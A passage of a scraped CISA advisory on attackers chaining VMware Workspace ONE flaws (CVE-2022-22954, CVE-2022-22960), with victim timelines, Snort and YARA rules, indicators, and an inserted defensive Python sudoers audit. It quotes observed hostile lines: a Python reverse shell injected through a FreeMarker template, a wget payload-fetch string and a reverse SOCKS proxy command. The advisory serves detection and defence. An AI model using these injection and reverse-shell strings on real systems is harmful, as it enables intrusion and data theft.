`app.jsp` is a publicly available [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001/>)] webshell known as Godzilla.\n * On April 13, TA2 downloaded a JSP webshell (MD5 `F8FF5C72E8FFA2112B01802113148BD1`) from `http://84.38.133[.]149/img/icon1.gif`.\n * On April 13, TA2 sent thousands of Unix commands [[T1059.004](<https://attack.mitre.org/versions/v11/techniques/T1059/004/>)] from IP address `84.38.133[.]149`, some of which enabled TA2 to view the `/etc/passwd` and `/etc/shadow` password files ([[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)], [[T1003.008](<https://attack.mitre.org/versions/v11/techniques/T1003/008/>)]). The Unix commands included `whoami`, `id`, and `cat`.\n\nThe trusted third party found two copies of the Dingo J-spy webshell (MD5 `5b0bfda04a1e0d8dcb02556dc4e56e6a`) in web directories: `horizon_all.jsp` was in the `/opt/vmware/horizon/workspace/webapps/SAAS/horizon/portal/` web directory and `jquery.jsp` was in the `/webapps/cas/static/` directory. The third party was unable to determine how and when the webshells were created. TA2 used `POST` requests to communicate with the Dingo J-spy webshells. The commands and output were obfuscated with an XOR key [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)].\n\nOn April 14, TA2 downloaded a reverse SOCKS proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)]. TA2 first sent a GET request with the `chmod` command to change the permissions of `.tmp12865xax`, a hidden file in the `/tmp` directory [[T1222.002](<https://attack.mitre.org/versions/v11/techniques/T1222/002/>)]. The actor then downloaded a binary (MD5 `dc88c5fe715b5f706f9fb92547da948a`) from https://github[.]com/kost/revsocks/releases/download/v1.1.0/revsocks_linux_amd64. 
The binary is a reverse SOCKS5 tunneling tool with TLS/SSL support and connects to `https://149.248.35[.]200.sslip.io`.\n\n#### _Additional Threat Actor Activity_\n\nThe trusted third party observed additional threat actor activity that does not seem to be related to TA1 or TA2. On April 13, IP address `172.94.89[.]112` attempted to connect a reverse shell on the compromised server to IP address `100.14.239[.]83` on port 5410. The threat actor injected a Python reverse shell through the same FreeMarker `Execute` primitive, using the following command:\n\n`freemarker.template.utility.Execute\"?new()(\"/usr/bin/python3.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"100[.]14[.]239[.]83\",5410));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"-i\"]);')}`\n\n### Victim 2 \n\nCISA received a related malicious Bash script for analysis from a trusted third party. The analyzed script, deployed on or around April 12, exploits CVE-2022-22960 and allows the `horizon` user to escalate privileges and execute commands and scripts as the superuser via `sudo`. The Bash script also collects network and other host information.\n\nThe script saves a copy of the `publishCaCert.hzn` script as `fd86ald0.pem`, overwrites `publishCaCert.hzn`, and executes commands that compress files containing network interface configuration, the list of users, passwords, master keys, hosts, and domains into a TAR archive. The TAR archive, located in the VMware Workspace ONE Access directory `/opt/vmware/horizon/workspace/webapps/SAAS/horizon/images/`, is readable and writable by the `horizon` web user and readable by all other users. 
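The Victim 2 script works because a support script that `sudo` runs as root can be written by the `horizon` user, which is the CVE-2022-22960 condition the detection table later in this CSA describes for `certproxyService.sh`, `exportCustomGroupUsers.sh`, and `extractUserIdFromDatabase.sh`. The following Python audit is an added example, not CISA's or VMware's code. It parses a sudoers-style policy for commands the `horizon` user may run as root and reports any whose file, or whose parent directory, that user can write. The sudoers fragment, the `hardened.sh` and `/opt/example/dropdir/tool.sh` paths, the uid/gid values, and all permission bits are constructed for illustration; the appliance's real sudo policy and ownership are not given in this CSA. Pass `os_stat` instead of `FAKE_FS.get` to run it against a live host.

```python
import os
import re
import stat
from collections import namedtuple

# Minimal ownership/mode view of a path; None means "does not exist".
FileStat = namedtuple("FileStat", "uid gid mode")

# Constructed sudoers fragment (assumption, not the product's real policy). It
# grants horizon root execution of two support scripts named in this CSA plus
# two hypothetical paths that show a clean result and a replaceable-directory case.
SAMPLE_SUDOERS = """
Defaults env_reset
root ALL=(ALL) ALL
horizon ALL=(root) NOPASSWD: /usr/local/horizon/scripts/exportCustomGroupUsers.sh, /usr/local/horizon/scripts/extractUserIdFromDatabase.sh
horizon ALL=(root) NOPASSWD: /usr/local/horizon/scripts/hardened.sh --check
horizon ALL=(root) NOPASSWD: /opt/example/dropdir/tool.sh
"""

HORIZON_UID, HORIZON_GID = 1000, 1000   # assumed ids for the example

# Constructed permissions, not observed values from any product build.
FAKE_FS = {
    "/usr/local/horizon/scripts": FileStat(0, 0, 0o755),
    "/usr/local/horizon/scripts/exportCustomGroupUsers.sh": FileStat(HORIZON_UID, HORIZON_GID, 0o755),  # owned by horizon
    "/usr/local/horizon/scripts/extractUserIdFromDatabase.sh": FileStat(0, HORIZON_GID, 0o775),         # group-writable
    "/usr/local/horizon/scripts/hardened.sh": FileStat(0, 0, 0o755),                                      # root-owned, 0755
    "/opt/example/dropdir": FileStat(0, HORIZON_GID, 0o775),                                              # writable parent dir
    "/opt/example/dropdir/tool.sh": FileStat(0, 0, 0o755),
}

# user  host=(runas) [TAG:]* commands
SUDO_RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+\S+\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?:(?:NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*)*(?P<cmds>.+)$"
)


def sudo_targets(sudoers_text, user):
    """Absolute commands `user` may run as root. Aliases, %group entries and
    '!' negations are not handled (assumption: plain per-user rules only)."""
    targets = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = SUDO_RULE_RE.match(line)
        if not m or m.group("user") != user:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip()
        if runas not in ("root", "ALL"):
            continue
        for spec in m.group("cmds").split(","):
            cmd = spec.strip().split()[0]   # drop argument restrictions
            if cmd.startswith("/"):
                targets.append(cmd)
    return targets


def writable_by(st, uid, gids):
    """Unix permission check: owner bits if owner, else group bits, else other bits."""
    if st.uid == uid:
        return bool(st.mode & stat.S_IWUSR)
    if st.gid in gids:
        return bool(st.mode & stat.S_IWGRP)
    return bool(st.mode & stat.S_IWOTH)


def audit(sudoers_text, user, uid, gids, stat_fn):
    """Return [(path, [reasons])] for root-run scripts `user` can modify or replace."""
    findings = []
    for path in sudo_targets(sudoers_text, user):
        script, parent = stat_fn(path), stat_fn(os.path.dirname(path))
        reasons = []
        if script and writable_by(script, uid, gids):
            reasons.append("script is writable by " + user)
        # A writable, non-sticky parent lets the user unlink and replace the
        # script even when the file itself is root-owned and 0755.
        if parent and writable_by(parent, uid, gids) and not parent.mode & stat.S_ISVTX:
            reasons.append("parent directory is writable by " + user)
        if reasons:
            findings.append((path, reasons))
    return findings


def os_stat(path):
    """Live stat_fn for running the audit on a real host."""
    try:
        s = os.stat(path)
    except FileNotFoundError:
        return None
    return FileStat(s.st_uid, s.st_gid, stat.S_IMODE(s.st_mode))


if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_SUDOERS, "horizon", HORIZON_UID, {HORIZON_GID}, FAKE_FS.get):
        print(path, "->", "; ".join(reasons))
```

The parent-directory check matters on a patched system too: a root-owned, mode 0755 script in a directory `horizon` can write to can still be unlinked and replaced, so the fix has to cover the directory as well as the file. The parser only understands plain per-user rules; for aliases, `%group` entries and `!` negations use `sudo -l -U horizon` or a full sudoers parser.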
\n\nThe malicious script deletes evidence of compromise by restoring `publishCaCert.hzn` from the saved copy `fd86ald0.pem` and then removing `fd86ald0.pem`.\n\nThe trusted third party observed the following IPs downloading, executing, and checking the bash script.\n\n * `45.72.112[.]245`\n * `115.167.53[.]141`\n * `191.102.179[.]197`\n * `209.127.110[.]126`\n * `45.72.85[.]172`\n * `192.241.67[.]12`\n\nThe trusted third party observed the following additional malicious IPs:\n\n * `20.232.97[.]189` \u2013 used for command and control [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)]\n * `194.31.98[.]141` \u2013 attempted to download the MoneroOcean miner from GitHub\n * `8.45.41[.]114` \u2013 ran `cat` on a number of files in `/usr/local/horizon/conf`\n * `85.203.36[.]66` \u2013 attempted to pull down a JSP webshell from `http://84.38.133[.]149/img/icon.gif`\n\n_**Update End**_\n\n### Detection Methods\n\n#### Signatures\n\n**Note:** servers vulnerable to CVE-2022-22954 may use Hypertext Transfer Protocol Secure (HTTPS) to encrypt client/server communications. 
Secure Sockets Layer (SSL)/Transport Layer Security (TLS) decryption can be used as a workaround for network-based detection and threat hunting efforts.\n\nThe following CISA-created Snort signature may detect malicious network traffic related to exploitation of CVE-2022-22954:\n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"VMware:HTTP GET URI contains '/catalog-portal/ui/oauth/verify?error=&deviceUdid=':CVE-2022-22954\"; sid:1; rev:1; flow:established,to_server; content: \"GET\"; http_method; content:\"/catalog-portal/ui/oauth/verify?error=&deviceUdid=\"; http_uri; reference:cve,2022-22954; reference:url,github.com/sherlocksecurity/VMware-CVE-2022-22954;`\n\n`reference:url,github.com/tunelko/CVE-2022-22954-PoC/blob/main/CVE-2022-22954.py; priority:2; metadata:service http;)`\n\nThe following third-party Snort signature may detect exploitation of VMware Workspace ONE Access server-side template injection:\n\n`10000001alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\"Workspace One Serverside Template Injection\";content:\"GET\"; http_method; content:\"freemarker.template.utility.Execute\";nocase; http_uri; priority:1; sid:;rev:1;)`\n\n_**Update June 2, 2022:**_\n\n`alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\"Workspace One Serverside Template Injection\";content:\"GET\"; http_method; content:\"freemarker.template.utility.Execute\";nocase; http_uri; priority:1; sid:100000001;rev:1;) `\n\n_**Update End**_\n\nThe following third-party YARA rule may detect unmodified instances of the Dingo J-spy webshell on infected hosts:\n\n`rule dingo_jspy_webshell \n{ \nstrings: \n$string1 = \"dingo.length\" \n$string2 = \"command = command.trim\" \n$string3 = \"commandAction\" \n$string4 = \"PortScan\" \n$string5 = \"InetAddress.getLocalHost\" \n$string6 = \"DatabaseManager\" \n$string7 = \"ExecuteCommand\" \n$string8 = \"var command = form.command.value\" \n$string9 = \"dingody.iteye.com\" \n$string10 = \"J-Spy ver\" \n$string11 = \"no permission 
,die\" \n$string12 = \"int iPort = Integer.parseInt\" \ncondition: \nfilesize < 50KB and 12 of ($string*) \n}`\n\n**Note:** the Dingo J-spy webshell is an example of post-exploitation tools that actors have used. Administrators should examine their network for any sign of post-exploitation activity.\n\n**_Update June 2, 2022:_**\n\nThe following third-party YARA rule may detect unmodified instances of the Godzilla webshell on infected hosts:\n\n`rule Godzilla_Webshell \n{ \nstrings: \n$string1 = \"TomcatListenerMemShellFromThread\" \n$string2 = \"String xc =\" \n$string3 = \"String pass =\" \n$string4 = \"ServletRequestListener\" \n$string5 = \"cmds = new String\" \n$string6 = \"cmd\" \n$string7 = \"bin/bash\" \n$string8 = \"getInputStream\" \n$string9 = \"javax.crypto.Cipher c = javax.crypto.Cipher.getInstance\" \n$string10 = \"godzilla\" \ncondition: \nfilesize < 20KB and 10 of ($string*) \n}`\n\nThe following third-party YARA rule may detect unmodified instances of the TomCat JSP webshell on infected hosts:\n\n`rule Tomcatjsp_Webshell \n{ \nstrings: \n$string1 = \"ExecShellCmd\" \n$string2 = \"stCommParams\" \n$string3 = \"nKeyOffset = EncryptData\" \n$string4 = \"InputStream is = process.getInputStream\" \n$string5 = \"Process process = Runtime.getRuntime\" \n$string6 = \"ExecBinary\" \n$string7 = \"byte bzKey\" \n$string8 = \"nKeyOffset++\" \n$string9 = \"HttpServletRequest request, HttpServletResponse response\" \n$string10 = \"connect_test cmd\" \n$string11 = \"exec cmd\" \n$string12 = \"file upload\" \ncondition: \nfilesize < 25KB and 12 of ($string*) \n}`\n\nThe following third-party YARA rule may detect unmodified instances of the reverse SOCKS proxy on infected hosts:\n\n`rule reversesocks_tool \n{ \nmeta: \nmd5 = \"dc88c5fe715b5f706f9fb92547da948a\" \nstrings: \n$string1 = \"revsocks\" \n$string2 = \"-connect\" \n$string3 = \"client:8080 -pass test\" \n$string4 = \"RSA TESTING KEY\" \n$string5 = \"SETTINGS_MAX_CONCURRENT_STREAMS\" \n$string6 = \"Start on the 
server:\" \n$string7 = \"closing connection\" \n$string8 = \"socks 127.0.0.1:1080\" \n$string9 = \"revsocks -listen :8080\" \ncondition: \nuint16(0) == 0x457F and filesize < 6MB and 8 of ($string*) } `\n\n_**Update End**_\n\n#### Behavioral Analysis and Indicators of Compromise\n\nAdministrators should conduct behavioral analysis on root accounts of vulnerable systems by: \n\n * Using the indicators listed in table 1 to detect potential malicious activity.\n * Reviewing systems logs and gaps in logs.\n * Reviewing abnormal connections to other assets.\n * Searching the command-line history.\n * Auditing running processes.\n * Reviewing local user accounts and groups. \n * Auditing active listening ports and connections.\n\n_Table 1: Third-party IOCs for Exploitation of CVE-2022-22954 and CVE-2022-22960 _ \n_**Used around April 12\u201314, 2022 (Updated June 2, 2022)**_ \n\n\nIP Addresses \n--- \n**Indicator** | **Comment** \n`136.243.75[.]136 ` | On or around April 12, 2022, malicious cyber actors may have used this German-registered IP address to conduct the activity. However, the actors may have used the Privax HMA VPN client to conduct operations. \n**_Update June 2, 2022:_** \n`84.38.133[.]149` | A threat actor used this IP for command and control. \n`186.233.187[.]245` | This IP attempted to upload webshells. The user agent string for this IP was `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 ` \n`212.227.198[.]95` | \n`20.232.97[.]189` | A threat actor used this IP for command and control (see Victim 1 and Victim 2 sections). \n`160.20.145[.]225` | \n`149.248.35[.]200` | \n`100.14.239[.]83` | A threat actor attempted to connect a reverse shell on the compromised server to this IP address. \n`51.79.171[.]53` | This IP address attempted to upload a webshell \n`172.94.89[.]112` | This IP address attempted to have a reverse shell on the compromised server to connect back to IP Address `100.14.239[.]83` on port 5410. 
\n`83.84.74[.]155` | \n`194.31.98[.]141` | This IP attempted to download the MoneroOcean miner from GitHub. \n`8.45.41[.]114` | This IP ran `cat` on a number of files in `/usr/local/horizon/conf`. \n`85.203.36[.]66` | This IP attempted to pull down a JSP webshell from `http://84.38.133[.]149/img/icon.gif`. \n`45.72.112[.]245`, `115.167.53[.]141`, `191.102.179[.]197`, `209.127.110[.]126`, `45.72.85[.]172`, `192.241.67[.]12` | These IPs downloaded, executed, and checked a malicious bash script. \n**Domains** | \n`https://149.248.35[.]200.sslip[.]io` | \n`sslip[.]io` | \n`https://github[.]com/kost/revsocks/releases/download` | \n**_Update End_** | \n**Scanning, Exploitation Strings, and Commands Observed** | \n`catalog-portal/ui/oauth/verify` | \n`/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"cat /etc/hosts\")}` | \n`/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"wget -U \"Hello 1.0\" -qO - http://[REDACTED]/one\")}` | \n`freemarker.template.utility.Execute` | Search for this function in `/opt/vmware/horizon/workspace/logs/greenbox_web.log` (**_Update June 2, 2022:_** or `/opt/vmware/horizon/workspace/logs/greenbox_web.log*` **_Update End_**). `freemarker.template.utility.Execute` may be legitimate but could also indicate malicious shell commands. URL-decode the logs before searching for it, since the payload is percent-encoded in the request. \n`/opt/vmware/certproxy/bing/certproxyService.sh` | Check whether commands have been placed into this script; CVE-2022-22960 lets a local user write to it, and it is executed as root. \n`/horizon/scripts/exportCustomGroupUsers.sh` | Check whether commands have been placed into this script; CVE-2022-22960 lets a local user write to it, and it is executed as root. 
\n`/horizon/scripts/extractUserIdFromDatabase.sh` | Check whether commands have been placed into this script; CVE-2022-22960 lets a local user write to it, and it is executed as root. \n**_Update June 2, 2022:_** | \n`.tmp12865xax2 -connect 149[.]248[.]35[.]200.sslip[.]io:443 -pass OneTwoOne123!` (Bash) | Invocation of the reverse SOCKS proxy described in the Victim 1 section. \n**_Update End_** | \n**Files** | \n`horizon.jsp` (**_June 2, 2022 Update:_** `jquery.jsp`, MD5 `5b0bfda04a1e0d8dcb02556dc4e56e6a` **_Update End_**) | Found in `/usr/local/horizon/workspace/webapps/SAAS/horizon/js-lib` \n_**Update June 2, 2022:**_ | \n`jest.jsp` | \n`74805fa847acac6adc896968421ec9e` (MD5) | \n`dc88c5fe715b5f706f9fb92547da948a` (MD5) | Reverse SOCKS proxy \n_**Update End**_ | \n**Webshells** | \n`jspy` (**_Update June 2, 2022:_** MD5 `C509282c94b504129ac6ef168a3f08a8` **_Update End_**) | \n`godzilla` (**_Update June 2, 2022:_** `app.jsp`, MD5 `4cd8366345ad4068feca4d417738b4bd` **_Update End_**) | \n`tomcatjsp` | \n \n**_Update May 25, 2022:_** see Palo Alto Networks Unit 42 [Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)](<https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/>) for additional IOCs to detect possible exploitation or compromise. Note: due to the urgency to share this information, CISA has not yet validated this content.\n\n### Incident Response\n\nIf administrators discover system compromise, CISA recommends they:\n\n 1. **Immediately isolate affected systems.**\n 2. **Collect and review relevant logs, data, and artifacts.**\n 3. **Consider soliciting support from a third-party incident response organization** to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.\n 4. 
**Report incidents to CISA** via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870).\n\n### Mitigations\n\nCISA recommends organizations update impacted VMware products to the latest version or remove impacted versions from organizational networks. CISA does not endorse alternative mitigation options. As noted in [ED 22-03 Mitigate VMware Vulnerabilities](<https://www.cisa.gov/emergency-directive-22-03>), CISA expects malicious cyber actors to quickly develop a capability to exploit the newly released vulnerabilities CVE-2022-22972 and CVE-2022-22973 in the same impacted VMware products. ED 22-03 directs all Federal Civilian Executive Branch agencies to enumerate all instances of impacted VMware products and deploy the updates in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or to remove the affected software from the agency network until the updates can be applied.\n\n### Resources\n\n * [ED 22-03 Mitigate VMware Vulnerabilities](<https://www.cisa.gov/emergency-directive-22-03>)\n * [VMware Security Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)\n * [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>)\n * **_Update May 25, 2022:_** Palo Alto Networks Unit 42 [Threat Brief: VMware Vulnerabilities Exploited in the Wild (CVE-2022-22954 and Others)](<https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/>)\n\n### Contact Information\n\nCISA encourages recipients of this CSA to report incidents to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870).\n\n### References\n\n[1] [VMware Security Advisory VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>) \n[2] [Ibid](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>)\n\n**_Update June 2, 2022:_**\n\n### 
Appendix: MITRE ATT&CK TTPs\n\nThreat actors and their malware have used the TTPs in table 1 when exploiting CVE-2022-22954 and/or CVE-2022-22960 and conducting related activity. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) framework for all referenced threat actor tactics and techniques.\n\n_Table 2: MITRE ATT&CK TTPs_\n\n**Tactic** | **Technique** \n---|--- \nResource Development [[TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042/>)] | Obtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001/>)] \nExecution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002/>)] | Command and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v11/techniques/T1059/>)] \n | Command and Scripting Interpreter: Unix Shell [[T1059.004](<https://attack.mitre.org/versions/v11/techniques/T1059/004/>)] \n | Exploitation for Client Execution [[T1203](<https://attack.mitre.org/versions/v11/techniques/T1203>)] \nPersistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003/>)] | Server Software Component: Web Shell [[T1505.003](<https://attack.mitre.org/versions/v11/techniques/T1505/003/>)] \nPrivilege Escalation [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004/>)] | Exploitation for Privilege Escalation [[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)] \nDefense Evasion [[TA0005](<https://attack.mitre.org/versions/v11/tactics/TA0005/>)] | File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification [[T1222.002](<https://attack.mitre.org/versions/v11/techniques/T1222/002/>)] \n | Indicator Removal on Host [[T1070](<https://attack.mitre.org/versions/v11/techniques/T1070/>)] \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006/>)] | OS Credential Dumping: /etc/passwd and /etc/shadow [[T1003.008](<https://attack.mitre.org/versions/v11/techniques/T1003/008/>)] \nCollection [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009/>)] | Archive Collected Data [[T1560](<https://attack.mitre.org/versions/v11/techniques/T1560/>)] \nCommand and Control [[TA0011](<https://attack.mitre.org/versions/v11/tactics/TA0011/>)] | Application Layer Protocol: Web Protocols [[T1071.001](<https://attack.mitre.org/versions/v11/techniques/T1071/001/>)] \n | Encrypted Channel: Symmetric Cryptography [[T1573.001](<https://attack.mitre.org/versions/v11/techniques/T1573/001/>)] \n | Proxy [[T1090](<https://attack.mitre.org/versions/v11/techniques/T1090/>)] \n | Ingress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v11/techniques/T1105/>)] \nExfiltration [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004/>)] | \n \n**_Update End_**\n\n### Revisions\n\nInitial Version: May 18, 2022 | May 25, 2022: Added Industry Resource | June 2, 2022: Added Detection Signatures, IOCs, and TTPs\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T12:00:00", "type": "ics", "title": "Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-06-02T12:00:00", "id": "AA22-138B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-05-19T11:27:36", "description": "CISA has issued [Emergency Directive (ED) 22-03](<https://www.cisa.gov/emergency-directive-22-03>) and released a [Cybersecurity Advisory (CSA)](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) in response to active and expected exploitation of multiple vulnerabilities in the following VMware products: VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, vRealize Suite Lifecycle Manager.\n\nThe CSA, [AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>), provides indicators of compromise and detection signatures from CISA as well as trusted third parties to assist administrators with detecting and responding to active exploitation of CVE-2022-22954 and CVE-2022-22960. Malicious cyber actors were able to reverse engineer the vendor updates to develop an exploit within 48 hours and quickly began exploiting these disclosed vulnerabilities in unpatched devices. Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022. 
\n\n[ED 22-03](<https://www.cisa.gov/emergency-directive-22-03>) directs all Federal Civilian Executive Branch agencies to enumerate all instances of affected VMware products and either deploy updates provided in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>), released May 18, 2022, or remove those instances from agency networks.\n\nCISA strongly encourages all organizations to deploy updates provided in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove those instances from networks. CISA also encourages organizations with affected VMware products that are accessible from the internet to assume compromise and initiate threat hunting activities using the detection methods provided in [the CSA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>). If potential compromise is detected, administrators should apply the incident response recommendations included in [the CSA](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T00:00:00", "type": "cisa", "title": "CISA Issues Emergency 
Directive and Releases Advisory Related to VMware Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-18T00:00:00", "id": "CISA:07834FF4B4F96A051DF8DCF65DA68FF2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}